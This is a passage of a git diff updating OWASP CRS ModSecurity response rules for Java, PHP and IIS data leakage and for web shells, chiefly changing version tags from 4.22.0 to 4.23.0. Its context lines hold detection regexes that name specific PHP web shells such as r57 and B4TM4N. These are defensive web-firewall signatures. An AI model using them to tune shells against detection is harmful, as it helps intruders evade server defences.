"id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 
4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index 11f0159516..82da2f05ea 100644 --- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-JAVA',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # 
@@ -50,30 +50,30 @@ SecRule RESPONSE_BODY "@rx (?i)\b(?:java[\.a-z]+E(?:xception|rror)|(?:org|com)\. tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-JAVA',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule 
TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf index b391173084..053e8879eb 100644 --- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # 
@@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -73,7 +73,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" 
@@ -99,13 +99,13 @@ SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -133,21 +133,21 @@ SecRule RESPONSE_BODY "@rx (?i)Empty string|F(?:ile size is|reeing memory)|Heade tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf index ca1f6885be..9403a7bcc0 100644 
--- a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf +++ b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "@rx (?i)[a-z]:[\x5c/]inetpub\b" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" 
@@ -69,7 +69,7 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?: tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -93,7 +93,7 @@ SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -115,7 +115,7 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \ @@ -125,8 +125,8 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -151,21 +151,21 @@ SecRule RESPONSE_BODY "@rx (?i)[\x5c/]inetpub\b" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-955-WEB-SHELLS.conf b/rules/RESPONSE-955-WEB-SHELLS.conf index c6cef68bc7..8b3c692279 100644 --- a/rules/RESPONSE-955-WEB-SHELLS.conf +++ b/rules/RESPONSE-955-WEB-SHELLS.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -46,7 +46,7 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -66,7 +66,7 @@ SecRule RESPONSE_BODY "@rx r57 Shell Version [0-9.]+|r57 s tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -86,7 +86,7 @@ SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content= tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -106,7 +106,7 @@ SecRule RESPONSE_BODY "@rx B4TM4N SH3LL[^<]*Mini Shell[^D]*Developed By LameHacker tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -146,7 +146,7 @@ SecRule RESPONSE_BODY "@rx \.:: [^~]*~ Ashiyane V [0-9.]+ ::\." \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -166,7 +166,7 @@ SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -186,7 +186,7 @@ SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -206,7 +206,7 @@ SecRule RESPONSE_BODY "@rx ^\r\n\r\nGRP WebShell [0-9.]+ " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -226,7 +226,7 @@ SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -246,7 +246,7 @@ SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -266,7 +266,7 @@ SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum [^<]*<title> tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -286,7 +286,7 @@ SecRule RESPONSE_BODY "@rx <title>lama's'hell v. [0-9.]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -306,7 +306,7 @@ SecRule RESPONSE_BODY "@rx ^ *\n[ ]+\n[ ]+lostDC - " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -326,7 +326,7 @@ SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell\r\n\r\n\r\n tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -346,7 +346,7 @@ SecRule RESPONSE_BODY "@rx ^\n\n
